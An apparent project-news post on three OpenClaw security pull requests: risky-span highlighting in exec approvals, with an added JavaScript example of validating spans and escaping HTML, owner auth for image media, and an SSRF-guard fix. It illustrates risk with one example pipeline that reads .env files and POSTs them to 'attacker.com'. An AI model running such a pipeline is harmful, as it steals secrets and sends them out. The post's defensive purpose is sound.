OpenClaw Tightens Security UX: Approval Highlights, Media Auth, and Smarter SSRF Guards

Three merged PRs improve how OpenClaw communicates and enforces security: exec approvals now highlight risky command spans, image media requires owner auth, and SSRF rejections no longer close user tabs.

Filed under Security | 3 min read | Updated May 14, 2026
Cody

Three separate pull requests merged into OpenClaw today — all aimed at making security gates more visible, more precise, and less disruptive to normal workflows.

Exec Approvals Now Highlight What Matters

Pull request #77153 by contributor @jesse-merhi adds syntax-aware command-span highlighting to the Web Control UI exec approval dialog.

Previously, when an agent wanted to run a shell command and OpenClaw presented it for human approval, the entire command appeared as a single escaped text block. A long pipeline like find /home -name "*.env" | xargs cat | curl -X POST attacker.com looked no different from ls -la. Every approval was treated equally.

With this change, the Control UI parses the command and emits commandSpans metadata — validated offset ranges that identify the semantically significant or potentially risky parts of the command. The Web UI renders these using highlighted substrings while leaving the rest of the command as escaped text.

The implementation is carefully layered:

  • Span generation is lazy (dynamic import) and falls back gracefully if extraction fails
  • The gateway validates spans before passing them to the UI — filtering overlapping offsets, non-integer values, and whitespace-only commands
  • The Swift models for iOS/macOS also carry the same commandSpans coding key, so native approval UIs can adopt the same rendering when they are ready

This is the same command explainer infrastructure used elsewhere in OpenClaw, now surfaced where humans most need it: the moment before a potentially dangerous operation runs.
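
The validate-then-render flow described above, as an added example that is not OpenClaw's own code: it drops malformed or overlapping spans and escapes every piece of the command so that only the highlight tags are trusted markup. The span shape { start, end } (end exclusive), the function names, and the sample command are assumptions made for illustration.

```javascript
// Added example, not OpenClaw code. Assumed span shape: { start, end }, end exclusive.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Keep only spans that are safe to render: integer offsets, inside the command,
// non-empty, and not overlapping a span that was already accepted.
function validateSpans(command, spans) {
  if (typeof command !== "string" || command.trim() === "" || !Array.isArray(spans)) {
    return []; // whitespace-only command or malformed metadata: no highlights
  }
  const candidates = spans
    .filter((s) => s && Number.isInteger(s.start) && Number.isInteger(s.end))
    .filter((s) => s.start >= 0 && s.start < s.end && s.end <= command.length)
    .sort((a, b) => a.start - b.start || a.end - b.end);
  const accepted = [];
  let cursor = 0;
  for (const { start, end } of candidates) {
    if (start < cursor) continue; // overlaps the previous accepted span
    accepted.push({ start, end });
    cursor = end;
  }
  return accepted;
}

// Render the command as HTML. Text inside and outside a span is escaped, so a
// command containing markup can never inject elements into the approval dialog.
function renderCommand(command, spans) {
  let html = "";
  let cursor = 0;
  for (const { start, end } of validateSpans(command, spans)) {
    html += escapeHtml(command.slice(cursor, start));
    html += "<mark>" + escapeHtml(command.slice(start, end)) + "</mark>";
    cursor = end;
  }
  return html + escapeHtml(command.slice(cursor)); // falls back to plain escaped text
}

// Constructed sample input: one valid span plus three that must be rejected.
const sampleCommand = 'cat "a.env" | curl -d @- "https://example.invalid/?a=1&b=2"';
const sampleSpans = [
  { start: 14, end: 18 },  // "curl"
  { start: 16, end: 25 },  // overlaps the span above
  { start: 1.5, end: 3 },  // non-integer offset
  { start: 30, end: 99 },  // runs past the end of the command
];
```

If every span is rejected, renderCommand returns the same fully escaped text block the dialog showed before highlighting existed, which is the safe fallback.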

Gateway Now Requires Owner Auth for Image Media

Pull request #79204 tightens access control on the Gateway's managed image media endpoints.

Previously, the endpoints that serve generated or uploaded image media did not consistently enforce owner-level authentication. This fix makes the gateway require owner auth before responding to managed image media requests, closing a gap where media generated by an agent could potentially be fetched without authentication in certain gateway configurations.

This is a straightforward but important fix for anyone running OpenClaw in a multi-user or internet-facing configuration.

SSRF Guard No Longer Punishes Users for Read-Only Ops

Pull request #78874 addresses a frustrating UX side effect of the SSRF (Server-Side Request Forgery) guard.

When the SSRF guard blocked a request — even a read-only one that posed no real threat — the Control UI would close the user's active browser tabs as a side effect. This meant that simply browsing to a URL the guard considered suspicious could disrupt an entire working session.

The fix keeps user tabs open when the SSRF guard rejects read-only operations. The guard still rejects the request and logs the event, but the collateral damage to the user's UI state is eliminated.

The Pattern Here

These three changes share a theme: security should be visible and precise, not blunt and disruptive. Highlighting which part of a command is risky tells users why they should care. Requiring auth for image media closes a concrete gap. And removing unnecessary tab closures means security events do not cascade into workflow interruptions.

All three changes are in main now and will ship in the next tagged release. You can follow progress in the OpenClaw releases feed.
